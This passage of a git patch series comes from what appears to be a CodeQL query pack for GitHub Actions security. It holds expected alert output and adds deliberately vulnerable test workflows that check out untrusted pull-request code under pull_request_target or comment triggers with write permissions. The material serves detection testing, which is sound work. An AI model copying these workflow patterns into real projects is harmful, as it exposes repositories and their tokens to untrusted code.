.github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | +| .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | +| .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:37:7:48:4 | Run Step: vars | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | +| .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:66:9:79:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:87:9:95:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | +| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | +| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:36:9:39:6 | Uses Step | +| .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | +| .github/workflows/level0.yml:62:9:65:6 | Uses Step | .github/workflows/level0.yml:65:9:86:2 | Uses Step | +| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | +| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step | +| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | +| .github/workflows/level0.yml:103:9:107:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/level0.yml:129:9:133:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:22:9:29:6 | Uses Step | +| .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | +| .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | +| .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | +| .github/workflows/test2.yml:13:9:16:6 | Uses Step | .github/workflows/test2.yml:16:9:20:52 | Uses Step | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | .github/workflows/test3.yml:33:9:35:6 | Run Step | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | .github/workflows/test3.yml:35:9:41:63 | Uses Step | +| .github/workflows/test3.yml:33:9:35:6 | Run Step | .github/workflows/test3.yml:35:9:41:63 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:25:7:31:4 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | +| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | +| .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | +#select +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | From 878317ab6b28ecbdf2838a5ea393e223745a5db1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:18:10 +0200 Subject: [PATCH 0351/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 761554c60e6..847a7b83e54 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.4 +version: 0.1.5 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 9ccc911594f..be2b4e428c9 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.4 +version: 0.1.5 groups: [actions, queries] suites: codeql-suites extractor: javascript From 76b115deb09da540e370ebdbf557d19a84dc41fb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:44:44 +0200 Subject: [PATCH 0352/1267] Dedup Cache poisoning and Untrusted checkout --- ql/src/Security/CWE-349/CachePoisoning.ql | 3 +- .../CWE-349/.github/workflows/poc.yml | 63 ++++++++++++++++++ .../CWE-349/.github/workflows/poc2.yml | 58 +++++++++++++++++ .../CWE-349/.github/workflows/poc3.yml | 64 +++++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 57 +++++++++++++++++ .../CWE-829/.github/workflows/poc.yml | 63 ++++++++++++++++++ .../CWE-829/.github/workflows/poc2.yml | 58 +++++++++++++++++ .../CWE-829/.github/workflows/poc3.yml | 64 +++++++++++++++++++ .../CWE-829/.github/workflows/test.yml | 37 +++++++++++ .../UntrustedCheckoutCritical.expected | 60 +++++++++++++++++ .../CWE-829/UntrustedCheckoutMedium.expected | 2 + 11 files changed, 528 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 2a9952ce07f..f202b1fcecf 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -41,7 +41,8 @@ where // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) j.getAStep() = s and - s instanceof CacheWritingStep + s instanceof CacheWritingStep and + not s instanceof PoisonableStep or // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml new file mode 100644 index 00000000000..6900c3bc23f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml @@ -0,0 +1,63 @@ +# This workflow uses actions that are not certified by GitHub. +# They are provided by a third-party and are governed by +# separate terms of service, privacy policy, and support +# documentation. + +# Sample workflow for building and deploying a Jekyll site to GitHub Pages +name: Deploy Jekyll site to Pages preview environment +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] +# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages +permissions: + contents: read + pages: write + id-token: write +# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. +# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. +concurrency: + group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' + cancel-in-progress: false +jobs: + # Build job + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + # For PRs make sure to checkout the PR branch + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site + - name: Upload artifact + # Automatically uploads an artifact from the './_site' directory by default + uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 + # Deployment job + deploy: + environment: + name: 'Pages Preview' + url: ${{ steps.deployment.outputs.page_url }} + # Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages + permissions: + contents: read + pages: write + id-token: write + runs-on: ubuntu-latest + needs: build + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 + with: + preview: 'true' diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml new file mode 100644 index 00000000000..5501beb9ea2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml @@ -0,0 +1,58 @@ +name: branch-deploy + +on: + issue_comment: + types: [created] + +# Permissions needed for reacting and adding comments for IssueOps commands +permissions: + pull-requests: write + deployments: write + contents: write + checks: read + +jobs: + branch-deploy: + name: branch-deploy + if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings + ${{ github.event.issue.pull_request && + (startsWith(github.event.comment.body, '.deploy') || + startsWith(github.event.comment.body, '.noop') || + startsWith(github.event.comment.body, '.lock') || + startsWith(github.event.comment.body, '.help') || + startsWith(github.event.comment.body, '.wcid') || + startsWith(github.event.comment.body, '.unlock')) }} + runs-on: ubuntu-latest + + steps: + - name: branch-deploy + id: branch-deploy + uses: github/branch-deploy@v9 + with: + trigger: ".deploy" + environment: "production" + sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md + + # Check out the ref from the output of the IssueOps command + - uses: actions/checkout@v4 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + ref: ${{ steps.branch-deploy.outputs.ref }} + + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + bundler-cache: true + + - name: bootstrap + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + run: script/bootstrap + + # Here we run a deploy. It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue + - name: deploy + if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} + run: | + set -o pipefail + script/deploy | tee deploy.out + bundle exec ruby script/ci/render_deploy_message.rb + rm deploy.out diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml new file mode 100644 index 00000000000..4d5ae1f528c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml @@ -0,0 +1,64 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' + + deploy: + runs-on: ubuntu-latest + needs: build-and-upload + environment: + name: github-pages + url: ${{ steps.deployment.outputs.page_url }} + permissions: + pages: write + id-token: write + outputs: + deployment_url: ${{ steps.deployment.outputs.page_url }} + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@v1 + with: + preview: ${{ github.event_name == 'pull_request_target' }} diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 6a91d49c0ca..2580531afd3 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,4 +1,56 @@ edges +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | 